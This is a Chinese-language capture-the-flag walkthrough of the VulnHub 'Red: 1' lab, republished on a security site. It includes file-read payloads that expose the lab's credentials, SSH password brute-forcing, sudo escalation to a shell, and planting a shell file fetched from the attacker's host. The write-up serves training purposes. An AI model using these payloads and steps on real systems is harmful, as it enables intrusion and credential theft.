【靶场合集】vulnhub-Red: 1

admin 2024年2月16日00:39:15评论13 views字数 1914阅读6分22秒阅读模式
声明:请勿将文章内的相关技术用于非法目的,如有相关非法行为与文章作者和本公众号无关。请遵守《中华人民共和国网络安全法》。
0X01 前期准备
攻击IP:192.168.56.104靶机IP:192.168.56.101

0X02 信息收集

nmap -v -p 0-65535 192.168.56.101
【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

访问发现没有样式,点击hello,blue!发现跳转一个域名。http://redrocks.win/2021/10/24/hello-world/尝试将redrocks.win 添加进本地hostsvim /etc/hosts

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

根据首页提示,网站已经被入侵了,并且被植入了后门文件。进一步查看发现在http://redrocks.win/2021/10/24/hello-world/地址下存在一个提示。

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1
得到提示让我去寻找Mr. Miessler,通过百度寻找找到一个github地址。

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

下载下来在里面寻找到一些字典,对其尝试目录爆破。Git clone https://github.com/danielmiessler/SecLists.git最后在这个字典爆破出一个目录SecLists/Discovery/Web-Content/CommonBackdoors-PHP.fuzz.txtdirb http://redrocks.win/ CommonBackdoors-PHP.fuzz.txt

【靶场合集】vulnhub-Red: 1

直接访问返回500,尝试对参数进行爆破wfuzz -c -u 'http://redrocks.win/NetworkFileManagerPHP.php?FUZZ=test' -w burp-parameter-names.txtSecLists/Discovery/Web-Content/burp-parameter-names.txt(网络原因第一次爆破成功,后面一直爆破不出来,图也没办法截取)对参数进行爆破发现了key这个参数,测试发现存在目录遍历漏洞。http://192.168.56.101/NetworkFileManagerPHP.php?key=../../../etc/passwd

【靶场合集】vulnhub-Red: 1

Base64读取文件:php://filter/convert.base64-encode/resource=http://192.168.56.101/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=NetworkFileManagerPHP.php

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

提示能获取一个密码,并且有个hashcat的规则。这时候就想到了wp的配置文件http://192.168.56.101/NetworkFileManagerPHP.php?key=php://filter/convert.base64-encode/resource=wp-config.php

【靶场合集】vulnhub-Red: 1

帐号:john密码:R3v_m4lwh3r3_k1nG!!

0X03 获取权限

这里的帐号密码直接登录是登录不上的,根据提示要使用hashcat的规则进行爆破。

【靶场合集】vulnhub-Red: 1

Kali里面存在很多默认的rules,这里使用的是第一个。hashcat --stdout 1.txt -r /usr/share/hashcat/rules/best64.rule -o 2.txt

【靶场合集】vulnhub-Red: 1

前面端口收集22端口是开放的,对其进行爆破尝试hydra -l john -P 2.txt ssh://192.168.56.101
【靶场合集】vulnhub-Red: 1
注:密码随时在变化,如果断开需重新爆破
【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

0X04 提权
sudo -l

【靶场合集】vulnhub-Red: 1

sudo -u ippsec /usr/bin/time /bin/sh

【靶场合集】vulnhub-Red: 1

因为一直在弹出一些信息,修改john的密码,就考虑监控下进程。https://github.com/DominicBreuker/pspy/软件可以不在root权限进行进程监控使用python3开一个http文件管理让靶机下载文件。python3 -m http.server 8888http://192.168.56.104:8888/pspy64s很多文件无法下载,最后在/dev/shm目录下下载并使用

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

尝试将supersecretfileuc.c替换成shell文件https://ddosi.org/shell/

【靶场合集】vulnhub-Red: 1

【靶场合集】vulnhub-Red: 1

使用python3开服务传上去http://192.168.56.104:8888/supersecretfileuc.c
【靶场合集】vulnhub-Red: 1
【靶场合集】vulnhub-Red: 1
【靶场合集】vulnhub-Red: 1
0X05 分析
crontab -l 查看计划任务
【靶场合集】vulnhub-Red: 1
【靶场合集】vulnhub-Red: 1
【靶场合集】vulnhub-Red: 1

可以看见上面几个任务计划一直在执行修改密码等操作。

0X06

原文始发于微信公众号(皓月的笔记本):【靶场合集】vulnhub-Red: 1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年2月16日00:39:15
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【靶场合集】vulnhub-Red: 1https://cn-sec.com/archives/2165442.html

发表评论

匿名网友 填写信息